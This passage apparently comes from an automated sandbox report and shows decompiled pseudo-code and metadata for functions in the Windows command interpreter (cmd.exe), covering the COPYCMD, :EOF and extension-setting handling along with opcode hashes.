                                    						if(( *( *( *_t163 + 0x18)) & 0x00000010) == 0) {
                                    							_t222 = 0x5c;
                                    							_t258 = E011E2349(_t255, _t222);
                                    							if(_t258 == 0) {
                                    								_t259 = _v552;
                                    							} else {
                                    								_t259 = _t258 + 2;
                                    							}
                                    							_t223 = 0x5c;
                                    							if(E011E2349( *((intOrPtr*)( *_t163 + 0x10)), _t223) == 0) {
                                    								_t139 =  *((intOrPtr*)( *_t163 + 0x10));
                                    							}
                                    							E011E1040(_t259, _t238 - (_t259 - _v552 >> 1), _t139);
                                    						}
                                    						_t117 = _v28;
                                    						if(_v28 == 0) {
                                    							_t117 =  &_v548;
                                    						}
                                    						_t162 = _v564;
                                    						_t217 = _a16;
                                    						_t118 = E011E2D22(_t162, _a16, _t117);
                                    						if(_t118 != 0) {
                                    							goto L49;
                                    						} else {
                                    							_t256 = _t118;
                                    							 *0x1213cf0 = _t118;
                                    							SetLastError(_t118);
                                    							_t239 = _v568;
                                    							_t182 = _t162;
                                    							 *_t239 = 0;
                                    							_t120 =  *_t162 & 0x0000ffff;
                                    							_t217 = _t120;
                                    							if(_t120 == 0) {
                                    								L32:
                                    								_t121 = 0x5c;
                                    								if(_t217 == _t121) {
                                    									_t183 = _t162;
                                    									_t256 = 1;
                                    									__eflags = 1;
                                    									_t217 =  &(_t183[1]);
                                    									do {
                                    										_t122 =  *_t183;
                                    										_t183 =  &(_t183[1]);
                                    										__eflags = _t122 - _v556;
                                    									} while (_t122 != _v556);
                                    									 *((short*)(_t162 + (_t183 - _t217 >> 1) * 2 - 2)) = 0;
                                    								}
                                    								_t124 = GetFileAttributesW(_t162);
                                    								if(_t124 != 0xffffffff) {
                                    									__eflags = _t124 & 0x00000010;
                                    									if((_t124 & 0x00000010) != 0) {
                                    										 *_t239 = 1;
                                    										_t256 = 1;
                                    									}
                                    									L36:
                                    									if(_t256 != 0) {
                                    										_t125 = 0x5c;
                                    										_t126 = E011E2349(_v552, _t125);
                                    										_t256 = _t126;
                                    										__eflags = 0;
                                    										_t219 = _t126;
                                    										_t49 = _t219 + 2; // 0x2
                                    										_t127 = _t49;
                                    										do {
                                    											_t187 =  *_t219;
                                    											_t219 = _t219 + 2;
                                    											__eflags = _t187;
                                    										} while (_t187 != 0);
                                    										_t188 = _t162;
                                    										_t220 = _t219 - _t127;
                                    										__eflags = _t220;
                                    										_t217 = _t220 >> 1;
                                    										_t241 =  &(_t188[1]);
                                    										do {
                                    											_t128 =  *_t188;
                                    											_t188 =  &(_t188[1]);
                                    											__eflags = _t128 - _v556;
                                    										} while (_t128 != _v556);
                                    										_t52 = _t217 + 1; // -1
                                    										__eflags = _t52 + (_t188 - _t241 >> 1) - 0x7fe7;
                                    										if(__eflags > 0) {
                                    											goto L49;
                                    										}
                                    										_t217 = _a16;
                                    										E011E18C0(_t162, _a16, _t256);
                                    									}
                                    									__imp__??_V@YAXPAX@Z(_v28);
                                    									_pop(_t242);
                                    									return E011E6FD0(0, _t162, _v8 ^ _t260, _t217, _t242, _t256);
                                    								}
                                    								_t136 = GetLastError();
                                    								 *0x1213cf0 = _t136;
                                    								if(_t136 == 0 || _t136 == 2) {
                                    									goto L36;
                                    								} else {
                                    									__eflags = _t136 - 3;
                                    									if(__eflags == 0) {
                                    										goto L36;
                                    									}
                                    									_t170 = _t136;
                                    									goto L48;
                                    								}
                                    							}
                                    							do {
                                    								_t137 = _t182;
                                    								_t182 =  &(_t182[1]);
                                    							} while ( *_t182 != 0);
                                    							_t217 =  *_t137 & 0x0000ffff;
                                    							goto L32;
                                    						}
                                    					}
                                    					_t199 = _t254;
                                    					if( *((intOrPtr*)(E011DD7E6(_t199))) != 0) {
                                    						goto L46;
                                    					}
                                    					_t217 =  &(_t199[1]);
                                    					do {
                                    						_t146 =  *_t199;
                                    						_t199 =  &(_t199[1]);
                                    					} while (_t146 != 0);
                                    					if(_t199 - _t217 >> 1 > 0x7fe7) {
                                    						goto L49;
                                    					}
                                    					_t244 = _t254;
                                    					_t27 =  &(_t244[1]); // -1
                                    					_t202 = _t27;
                                    					do {
                                    						_t147 =  *_t244;
                                    						_t244 =  &(_t244[1]);
                                    					} while (_t147 != 0);
                                    					_t246 = _t244 - _t202 >> 1;
                                    					_t148 = E011E22C0(_t162, _t254);
                                    					_t28 = _t246 + 1; // -4
                                    					E011E1040(_t254, _t28, _t148);
                                    					_t150 = _t254[1] & 0x0000ffff;
                                    					_t227 = 0x3a;
                                    					if(_t150 != _t227) {
                                    						_t205 = 0x5c;
                                    						__eflags =  *_t254 - _t205;
                                    						if( *_t254 != _t205) {
                                    							L61:
                                    							_t206 = _v28;
                                    							__eflags = _t206;
                                    							if(_t206 == 0) {
                                    								_t206 =  &_v548;
                                    							}
                                    							 *_t206 =  *((intOrPtr*)( *0x1213cec));
                                    							_t153 = _v28;
                                    							__eflags = _t153;
                                    							if(_t153 == 0) {
                                    								_t153 =  &_v548;
                                    							}
                                    							 *((short*)(_t153 + 2)) = _t227;
                                    							_t154 = _v28;
                                    							__eflags = _t154;
                                    							if(_t154 == 0) {
                                    								_t154 =  &_v548;
                                    							}
                                    							 *((short*)(_t154 + 4)) = 0;
                                    							_t208 = _v28;
                                    							__eflags = _t208;
                                    							if(_t208 == 0) {
                                    								_t208 =  &_v548;
                                    							}
                                    							_t228 = _t208 + 2;
                                    							__eflags = 0;
                                    							do {
                                    								_t155 =  *_t208;
                                    								_t208 = _t208 + 2;
                                    								__eflags = _t155;
                                    							} while (_t155 != 0);
                                    							_t209 = _t208 - _t228;
                                    							__eflags = _t209;
                                    							_t229 = _t254;
                                    							_t210 = _t209 >> 1;
                                    							_t73 =  &(_t229[1]); // 0x1
                                    							_t248 = _t73;
                                    							do {
                                    								_t156 =  *_t229;
                                    								_t229 =  &(_t229[1]);
                                    								__eflags = _t156 - _v556;
                                    							} while (_t156 != _v556);
                                    							_t217 = _t229 - _t248 >> 1;
                                    							__eflags = _t210 + 1 + (_t229 - _t248 >> 1) - 0x7fe7;
                                    							if(__eflags > 0) {
                                    								goto L49;
                                    							}
                                    							E011E0CF2(_t217, _t254);
                                    							goto L19;
                                    						}
                                    						__eflags = _t150 - _t205;
                                    						if(_t150 == _t205) {
                                    							goto L18;
                                    						}
                                    						goto L61;
                                    					}
                                    					L18:
                                    					E011E0D89(_t227, _t254);
                                    					goto L19;
                                    				} else {
                                    					goto L1;
                                    				}
                                    				do {
                                    					L1:
                                    					_t161 =  *_t162 & 0x0000ffff;
                                    					_t162 =  &(_t162[1]);
                                    				} while (_t161 != 0);
                                    				goto L2;
                                    			}

                                    APIs
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011E6367
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011EF6F6
                                    • memset.MSVCRT ref: 011E60C8
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 011E620F
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E6247
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E6252
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                    • String ID: COPYCMD
                                    • API String ID: 1068965577-3727491224
                                    • Opcode ID: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                    • Instruction ID: 483a9fdbe8bd90f742b05a9b1b168e19983e5bc8bc7b47db92ee463cf8520405
                                    • Opcode Fuzzy Hash: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                    • Instruction Fuzzy Hash: 9BD1E635A009178BCB2DDFA8D8986BAB7F5EFA8304F454569DC06D7295EB30DE42CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E011D5E70(void* __ecx, signed int* _a4) {
                                    				signed int _v8;
                                    				short _v24;
                                    				short _v26;
                                    				short _v28;
                                    				signed short _v29;
                                    				signed int _v36;
                                    				signed int _v40;
                                    				signed short* _v44;
                                    				intOrPtr _v48;
                                    				int _v52;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t80;
                                    				signed int _t83;
                                    				signed int _t84;
                                    				signed int _t85;
                                    				signed int _t87;
                                    				signed int _t88;
                                    				signed int _t90;
                                    				signed int _t94;
                                    				signed int _t98;
                                    				signed int _t100;
                                    				intOrPtr _t104;
                                    				signed int _t107;
                                    				short* _t117;
                                    				signed int _t118;
                                    				signed short* _t120;
                                    				signed short _t122;
                                    				signed int _t124;
                                    				signed int _t129;
                                    				signed int _t132;
                                    				signed short _t133;
                                    				signed int _t135;
                                    				signed int _t139;
                                    				signed int _t140;
                                    				signed int _t141;
                                    				signed int _t142;
                                    				signed int _t143;
                                    				signed int _t144;
                                    				signed int _t145;
                                    				short _t148;
                                    				signed int _t154;
                                    				signed int _t155;
                                    				signed int _t156;
                                    				signed int _t157;
                                    				signed int _t162;
                                    				void* _t163;
                                    				signed short _t165;
                                    				signed short _t170;
                                    				void* _t173;
                                    				signed int _t174;
                                    				signed int _t177;
                                    				intOrPtr _t178;
                                    				void* _t189;
                                    				signed short* _t200;
                                    				signed int _t204;
                                    				void* _t205;
                                    				void* _t206;
                                    				signed int* _t212;
                                    				void* _t213;
                                    				void* _t214;
                                    				signed int _t216;
                                    				wchar_t* _t219;
                                    				int _t220;
                                    				void* _t221;
                                    				signed int _t223;
                                    				signed int* _t225;
                                    				signed int _t230;
                                    				signed int _t234;
                                    
                                    				_t230 = _t234;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t212 = _a4;
                                    				_t162 = 0;
                                    				_t219 = _t212[0xf];
                                    				if(_t219 == 0) {
                                    					L15:
                                    					if( *_t212 != 0x14) {
                                    						goto L65;
                                    					} else {
                                    						goto L16;
                                    					}
                                    				} else {
                                    					_t205 = 0x20;
                                    					while(1) {
                                    						_t80 =  *_t219 & 0x0000ffff;
                                    						if(_t80 == 0 || _t80 > _t205) {
                                    							break;
                                    						}
                                    						_t219 =  &(_t219[0]);
                                    						__eflags = _t219;
                                    						if(_t219 != 0) {
                                    							continue;
                                    						} else {
                                    						}
                                    						break;
                                    					}
                                    					if(_t219 == 0) {
                                    						goto L15;
                                    					} else {
                                    						__imp___wcsnicmp(_t219, L"/B", 2);
                                    						_t234 = _t234 + 0xc;
                                    						if(_t80 != 0) {
                                    							L11:
                                    							if(_t219 != 0) {
                                    								_t80 = swscanf(_t219, L"%d",  &_v8);
                                    								_t234 = _t234 + 0xc;
                                    								if(_t80 == 1) {
                                    									_t80 = _v8;
                                    									 *0x120b8b0 = _t80;
                                    									if( *0x1213ccc != _t162) {
                                    										_t162 = _t80;
                                    									}
                                    								}
                                    							}
                                    							goto L15;
                                    						} else {
                                    							 *_t212 = 0x14;
                                    							_t212[0xf] = L":EOF";
                                    							_t219 =  &(_t219[1]);
                                    							if(_t219 == 0) {
                                    								L16:
                                    								if( *0x1213cc4 == 0) {
                                    									L65:
                                    									_t170 =  *0x1203874;
                                    									E011DC7F7(_t80, _t170);
                                    									_t220 =  *0x120b8b0;
                                    									do {
                                    										__eflags = E011E4B60(__eflags, 0);
                                    									} while (__eflags == 0);
                                    									exit(_t220);
                                    									asm("int3");
                                    									_t83 =  *(_t162 + 0xc);
                                    									__eflags = _t83;
                                    									if(_t83 != 0) {
                                    										do {
                                    											_t216 = _t83;
                                    											_v40 = _t216;
                                    											_t83 =  *(_t216 + 0xc);
                                    											__eflags = _t83;
                                    										} while (_t83 != 0);
                                    										_t212 = _v36;
                                    										_t162 = _v40;
                                    									}
                                    									_t84 =  *_t220 & 0x0000ffff;
                                    									__eflags = _t84;
                                    									if(_t84 == 0) {
                                    										L38:
                                    										_t85 = 0;
                                    										__eflags = 0;
                                    										goto L39;
                                    									} else {
                                    										while(1) {
                                    											_t207 = 0x2f;
                                    											_v29 = _t170;
                                    											__eflags = _t84 - _t207;
                                    											if(_t84 != _t207) {
                                    												goto L36;
                                    											}
                                    											_t7 = _t220 + 4; // 0x4
                                    											_t117 = _t7;
                                    											_t165 = _t170;
                                    											__eflags =  *_t117 - 0x2d;
                                    											_v52 = _t117;
                                    											if( *_t117 == 0x2d) {
                                    												_v29 = 1;
                                    												_t165 = 1;
                                    											}
                                    											_t118 = _t165 & 0x0000ffff;
                                    											_v36 = _t118;
                                    											_t120 = _t220 + (_t118 + 2) * 2;
                                    											_v44 = _t120;
                                    											_t122 = towupper( *_t120 & 0x0000ffff);
                                    											_pop(_t196);
                                    											_t124 = (_t122 & 0x0000ffff) - 0x3f;
                                    											__eflags = _t124;
                                    											if(__eflags == 0) {
                                    												E011F9373(_t207, __eflags);
                                    												__eflags = 0;
                                    												_push(0);
                                    												_push(0x2381);
                                    												E011DC108(_t196);
                                    												 *0x1218065 = 0;
                                    												 *0x121851c = 0;
                                    												goto L93;
                                    											} else {
                                    												_t129 = _t124;
                                    												__eflags = _t129;
                                    												if(_t129 == 0) {
                                    													__eflags = _v29;
                                    													if(_v29 == 0) {
                                    														_t207 = _t212;
                                    														_t132 = E011F9CFA(_t220 + (_v36 + 3) * 2, _t212);
                                    														__eflags = _t132;
                                    														if(_t132 != 0) {
                                    															goto L93;
                                    														} else {
                                    															__eflags = _t212[2] & 0x00000001;
                                    															if((_t212[2] & 0x00000001) != 0) {
                                    																 *_t212 =  *_t212 | 0x00001000;
                                    															}
                                    															goto L33;
                                    														}
                                    													} else {
                                    														_t200 = _v44;
                                    														_t207 =  &(_t200[1]);
                                    														do {
                                    															_t133 =  *_t200;
                                    															_t200 =  &(_t200[1]);
                                    															__eflags = _t133 - _v48;
                                    														} while (_t133 != _v48);
                                    														_t196 = _t200 - _t207 >> 1;
                                    														__eflags = _t200 - _t207 >> 1 - 1;
                                    														if(_t200 - _t207 >> 1 > 1) {
                                    															goto L89;
                                    														} else {
                                    															_t212[1] = 6;
                                    															_t212[2] = 0;
                                    															goto L33;
                                    														}
                                    													}
                                    												} else {
                                    													_t139 = _t129 - 5;
                                    													__eflags = _t139;
                                    													if(_t139 == 0) {
                                    														__eflags = _v29;
                                    														_t140 =  *_t212;
                                    														if(_v29 != 0) {
                                    															_t141 = _t140 ^ 0x00001000;
                                    														} else {
                                    															_t141 = _t140 | 0x00001000;
                                    															__eflags = _t141;
                                    														}
                                    														goto L32;
                                    													} else {
                                    														_t143 = _t139 - 0xa;
                                    														__eflags = _t143;
                                    														if(_t143 == 0) {
                                    															__eflags = _v29;
                                    															_t144 =  *_t212;
                                    															if(_v29 == 0) {
                                    																_t141 = _t144 | 0x00000800;
                                    															} else {
                                    																_t141 = _t144 ^ 0x00000800;
                                    															}
                                    															goto L32;
                                    														} else {
                                    															_t145 = _t143 - 1;
                                    															__eflags = _t145;
                                    															if(_t145 != 0) {
                                    																__eflags = _t145 != 0;
                                    																if(_t145 != 0) {
                                    																	_t148 = 0x2f;
                                    																	_v28 = _t148;
                                    																	_v26 =  *((intOrPtr*)(_t220 + 4));
                                    																	_v24 = 0;
                                    																	_push(_t220 + ((_t165 & 0x0000ffff) + 2) * 2);
                                    																	_push(1);
                                    																	_push(0x2375);
                                    																	goto L91;
                                    																} else {
                                    																	__eflags = _v29;
                                    																	_t154 =  *_t212;
                                    																	if(_v29 != 0) {
                                    																		_t155 = _t154 ^ 0x00000010;
                                    																	} else {
                                    																		_t155 = _t154 | 0x00000010;
                                    																		__eflags = _t155;
                                    																	}
                                    																	 *_t212 = _t155;
                                    																	_t156 = _v36;
                                    																	__eflags =  *(_t220 + 6 + _t156 * 2);
                                    																	if( *(_t220 + 6 + _t156 * 2) == 0) {
                                    																		goto L33;
                                    																	} else {
                                    																		_t204 = (_t165 & 0x0000ffff) + 2;
                                    																		_t196 = _t220 + _t204 * 2;
                                    																		_push(_t220 + _t204 * 2);
                                    																		goto L90;
                                    																	}
                                    																}
                                    															} else {
                                    																__eflags = _v29;
                                    																_t157 =  *_t212;
                                    																if(_v29 != 0) {
                                    																	_t141 = _t157 ^ 0x00002000;
                                    																} else {
                                    																	_t141 = _t157 | 0x00002000;
                                    																}
                                    																L32:
                                    																 *_t212 = _t141;
                                    																_t196 = 0;
                                    																_t142 = _v36;
                                    																__eflags =  *(_t220 + 6 + _t142 * 2);
                                    																if( *(_t220 + 6 + _t142 * 2) != 0) {
                                    																	L89:
                                    																	_t135 = (_t165 & 0x0000ffff) + 2;
                                    																	__eflags = _t135;
                                    																	_push(_t220 + _t135 * 2);
                                    																	L90:
                                    																	_push(1);
                                    																	_push(0x2376);
                                    																	L91:
                                    																	E011DC5A2(_t196);
                                    																	L93:
                                    																	_t85 = 1;
                                    																	L39:
                                    																	_pop(_t213);
                                    																	_pop(_t221);
                                    																	__eflags = _v8 ^ _t230;
                                    																	_pop(_t163);
                                    																	return E011E6FD0(_t85, _t163, _v8 ^ _t230, _t207, _t213, _t221);
                                    																} else {
                                    																	L33:
                                    																	_t220 = _v52;
                                    																	_t162 = _v40;
                                    																	L34:
                                    																	_t220 = E011DD7E6(_t220);
                                    																	_t84 =  *_t220 & 0x0000ffff;
                                    																	__eflags = _t84;
                                    																	if(_t84 == 0) {
                                    																		goto L38;
                                    																	} else {
                                    																		_t170 = 0;
                                    																		continue;
                                    																	}
                                    																}
                                    															}
                                    														}
                                    													}
                                    												}
                                    											}
                                    											goto L102;
                                    											L36:
                                    											_t87 = _t212[0x12];
                                    											__eflags = _t87;
                                    											if(_t87 != 0) {
                                    												_t173 = 0x10;
                                    												_t88 = E011E00B0(_t173);
                                    												__eflags = _t88;
                                    												if(_t88 == 0) {
                                    													E011F9287(_t173);
                                    													__imp__longjmp(0x120b8b8, 1);
                                    													asm("int3");
                                    													_t174 = 0x1213ab0;
                                    													__eflags = 0;
                                    													do {
                                    														_t90 =  *_t174;
                                    														_t174 = _t174 + 2;
                                    														__eflags = _t90;
                                    													} while (_t90 != 0);
                                    													_t214 = (_t174 - 0x1213ab2 >> 1) + 1;
                                    													_t223 = HeapAlloc(GetProcessHeap(), 8, 0xc);
                                    													__eflags = _t223;
                                    													if(_t223 == 0) {
                                    														L96:
                                    														_t94 = 1;
                                    													} else {
                                    														_t177 = HeapAlloc(GetProcessHeap(), 8, _t214 + _t214);
                                    														 *_t223 = _t177;
                                    														__eflags = _t177;
                                    														if(_t177 == 0) {
                                    															goto L96;
                                    														} else {
                                    															_t98 =  *0x1213cb8;
                                    															__eflags = _t98;
                                    															if(_t98 == 0) {
                                    																_t98 = 0x1213ab0;
                                    															}
                                    															E011E1040(_t177, _t214, _t98);
                                    															_t100 = E011E3B2C(_t177);
                                    															 *(_t223 + 4) = _t100;
                                    															__eflags = _t100;
                                    															if(_t100 == 0) {
                                    																goto L96;
                                    															} else {
                                    																_t178 =  *0x1213cc4;
                                    																 *((char*)(_t223 + 8)) =  *0x1213cc9;
                                    																 *((char*)(_t223 + 9)) =  *0x1213cc8;
                                    																 *(_t178 + 0x90 +  *(_t178 + 0x14) * 4) = _t223;
                                    																_t104 =  *0x1213cd8;
                                    																 *(_t178 + 0x14) =  *(_t178 + 0x14) + 1;
                                    																 *((intOrPtr*)(_t178 + 0xc)) = _t104;
                                    																__eflags =  *((intOrPtr*)(_t178 + 0x10)) - _t104;
                                    																if( *((intOrPtr*)(_t178 + 0x10)) < _t104) {
                                    																	 *((intOrPtr*)(_t178 + 0x10)) = _t104;
                                    																}
                                    																_t225 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x3c)), 0, 0);
                                    																_t107 = 0;
                                    																 *0x120b8b0 = 0;
                                    																while(1) {
                                    																	__eflags =  *_t225 - _t107;
                                    																	if( *_t225 == _t107) {
                                    																		break;
                                    																	}
                                    																	__imp___wcsicmp(_t225, L"ENABLEEXTENSIONS");
                                    																	__eflags = _t107;
                                    																	if(_t107 != 0) {
                                    																		__imp___wcsicmp(_t225, L"DISABLEEXTENSIONS");
                                    																		__eflags = _t107;
                                    																		if(_t107 == 0) {
                                    																			 *0x1213cc9 = 0;
                                    																			goto L58;
                                    																		} else {
                                    																			__imp___wcsicmp(_t225, L"ENABLEDELAYEDEXPANSION");
                                    																			__eflags = _t107;
                                    																			if(_t107 != 0) {
                                    																				__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
                                    																				_t189 = _t225;
                                    																				__eflags = _t107;
                                    																				if(_t107 != 0) {
                                    																					__eflags =  *_t225;
                                    																					if( *_t225 == 0) {
                                    																						goto L58;
                                    																					} else {
                                    																						_push(0);
                                    																						_push(0x400023a6);
                                    																						E011DC5A2(_t189);
                                    																						_t94 = 1;
                                    																						 *0x120b8b0 = 1;
                                    																					}
                                    																				} else {
                                    																					 *0x1213cc8 = _t107;
                                    																					goto L58;
                                    																				}
                                    																			} else {
                                    																				 *0x1213cc8 = 1;
                                    																				goto L58;
                                    																			}
                                    																		}
                                    																	} else {
                                    																		 *0x1213cc9 = 1;
                                    																		L58:
                                    																		_t225 = E011DD7E6(_t225);
                                    																		_t107 = 0;
                                    																		__eflags = 0;
                                    																		continue;
                                    																	}
                                    																	goto L63;
                                    																}
                                    																_t94 = 0;
                                    																__eflags = 0;
                                    															}
                                    														}
                                    													}
                                    													L63:
                                    													return _t94;
                                    												} else {
                                    													 *(_t162 + 0xc) = _t88;
                                    													_t162 = _t88;
                                    													 *((intOrPtr*)(_t88 + 0xc)) = 0;
                                    													_t87 = _t212[0x12];
                                    													_v40 = _t162;
                                    													goto L37;
                                    												}
                                    											} else {
                                    												L37:
                                    												_t212[0x12] = _t87 + 1;
                                    												 *_t162 = E011E297B(E011E22C0(_t162, _t220));
                                    												 *((char*)(_t162 + 8)) = 1;
                                    												goto L34;
                                    											}
                                    											goto L102;
                                    										}
                                    									}
                                    								} else {
                                    									E011D6980(_t212);
                                    									return _t162;
                                    								}
                                    							} else {
                                    								_t206 = 0x20;
                                    								while(1) {
                                    									_t80 =  *_t219 & 0x0000ffff;
                                    									if(_t80 == 0 || _t80 > _t206) {
                                    										goto L11;
                                    									}
                                    									_t219 =  &(_t219[0]);
                                    									if(_t219 != 0) {
                                    										continue;
                                    									}
                                    									goto L11;
                                    								}
                                    								goto L11;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				L102:
                                    			}
                                    0x011ea932
                                    0x011ea939
                                    0x011ea93a
                                    0x011ea93c
                                    0x011ea94a
                                    0x011ea94d
                                    0x00000000
                                    0x011ea953
                                    0x011ea953
                                    0x011ea954
                                    0x011ea959
                                    0x011ea961
                                    0x011ea963
                                    0x011ea963
                                    0x011ea93e
                                    0x011ea93e
                                    0x00000000
                                    0x011ea93e
                                    0x011dc55a
                                    0x011dc55a
                                    0x00000000
                                    0x011dc55a
                                    0x011dc554
                                    0x011dc583
                                    0x011dc583
                                    0x011dc561
                                    0x011dc568
                                    0x011dc56a
                                    0x011dc56a
                                    0x00000000
                                    0x011dc56a
                                    0x00000000
                                    0x011dc581
                                    0x011dc58c
                                    0x011dc58c
                                    0x011dc58c
                                    0x011dc4de
                                    0x011dc4b9
                                    0x011dc58e
                                    0x011dc596
                                    0x011ea863
                                    0x011ea863
                                    0x011ea868
                                    0x011ea86a
                                    0x011ea86d
                                    0x011ea870
                                    0x00000000
                                    0x011ea870
                                    0x011dc3ae
                                    0x011dc3ae
                                    0x011dc3b1
                                    0x011dc3c0
                                    0x011dc3c2
                                    0x00000000
                                    0x011dc3c2
                                    0x00000000
                                    0x011dc3a8
                                    0x011dc2e7
                                    0x011d5f23
                                    0x011d5f24
                                    0x011d5f31
                                    0x011d5f31
                                    0x011d5ec9
                                    0x011d5ecb
                                    0x011d5ecc
                                    0x011d5ecc
                                    0x011d5ed2
                                    0x00000000
                                    0x00000000
                                    0x011d5eda
                                    0x011d5edd
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d5edd
                                    0x00000000
                                    0x011d5ecc
                                    0x011d5ec7
                                    0x011d5eb5
                                    0x011d5ea0
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmpswscanf
                                    • String ID: :EOF
                                    • API String ID: 1534968528-551370653
                                    • Opcode ID: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                    • Instruction ID: 9a743848c4572d711767abbe370205ac22ef8f816b3b7dd5a999dc47071e0d55
                                    • Opcode Fuzzy Hash: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                    • Instruction Fuzzy Hash: 35A10330A046169BEB2DDFACD4487BABBF5FF04314F14441EE942D7281EB759A41C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E011D58A4() {
                                    				intOrPtr _v8;
                                    				intOrPtr _v16;
                                    				long _v20;
                                    				intOrPtr _v24;
                                    				void _v28;
                                    				void _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				void* __ebx;
                                    				void* __ecx;
                                    				signed int _t22;
                                    				intOrPtr _t29;
                                    				long _t40;
                                    				intOrPtr _t45;
                                    				intOrPtr* _t49;
                                    				intOrPtr* _t57;
                                    				intOrPtr _t60;
                                    				intOrPtr* _t62;
                                    				void* _t67;
                                    
                                    				_t44 = _t67;
                                    				_push(_t45);
                                    				_push(_t45);
                                    				_v8 =  *((intOrPtr*)(_t67 + 4));
                                    				_t22 =  *0x1218064 & 0x000000ff;
                                    				_v24 = _t45;
                                    				_push(0);
                                    				_push(0x120b8f8);
                                    				_v16 = 0;
                                    				_v20 = 0xc0000001;
                                    				 *0x11fd560 = _t22;
                                    				L011E82C1();
                                    				if(_t22 != 0) {
                                    					_t60 = 1;
                                    					_v16 = 1;
                                    				} else {
                                    					_t48 =  *0x1213cb8;
                                    					if( *0x1213cb8 == 0) {
                                    						_t48 = 0x1213ab0;
                                    					}
                                    					_t51 =  *0x1213cc0;
                                    					E011E36CB(_t44, _t48,  *0x1213cc0, 0);
                                    					 *0x11fd56c = 0;
                                    					 *0x11fd5ac = 0;
                                    					 *0x11fd564 = 1;
                                    					 *0x11fd55c = 1;
                                    					 *0x11fd0c0 = 1;
                                    					_t29 =  *0x11fd5dc; // 0x0
                                    					_t49 = 0x24;
                                    					 *0x11fd5a8 = 0;
                                    					 *0x11fd5a4 = 0;
                                    					 *0x11fd568 = _t29;
                                    					_t62 = E011E00B0(_t49);
                                    					if(_t62 == 0) {
                                    						L14:
                                    						E011F9287(_t49);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						goto L15;
                                    					} else {
                                    						 *_t62 = 0;
                                    						 *((intOrPtr*)(_t62 + 0x1c)) = 0;
                                    						_t49 = 0x24;
                                    						_v36 = _t62;
                                    						 *((intOrPtr*)(_t62 + 0x20)) = 0;
                                    						_t57 = E011E00B0(_t49);
                                    						if(_t57 == 0) {
                                    							goto L14;
                                    						} else {
                                    							 *_t57 = 0;
                                    							 *((intOrPtr*)(_t57 + 0x1c)) = 0;
                                    							_v40 = _t57;
                                    							 *((intOrPtr*)(_t57 + 0x20)) = 0;
                                    							E011D450B(_v24, _t62, _t57);
                                    							_t40 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v32, 4, 0);
                                    							_v20 = _t40;
                                    							if(_t40 >= 0) {
                                    								_v28 = 2;
                                    								NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
                                    							}
                                    							_t51 = _t57;
                                    							_t49 = _t62;
                                    							if( *0x11fd55c == 4) {
                                    								L15:
                                    								E011F8664(_t49, _t51);
                                    								_t60 = _v16;
                                    							} else {
                                    								_t60 = E011D48E6(_t49, _t51);
                                    								_v16 = _t60;
                                    							}
                                    						}
                                    					}
                                    					E011E274C(0x1213d00, 0x104, L"%9d",  *0x11fd56c);
                                    					E011DC108(_t49, 0x2336, 1, 0x1213d00);
                                    					 *0x11fd560 =  *0x1218064 & 0x000000ff;
                                    				}
                                    				if(_v20 >= 0) {
                                    					NtSetInformationProcess(0xffffffff, 0x27,  &_v32, 4);
                                    				}
                                    				return _t60;
                                    			}























                                    APIs
                                    • _setjmp3.MSVCRT ref: 011D58E1
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
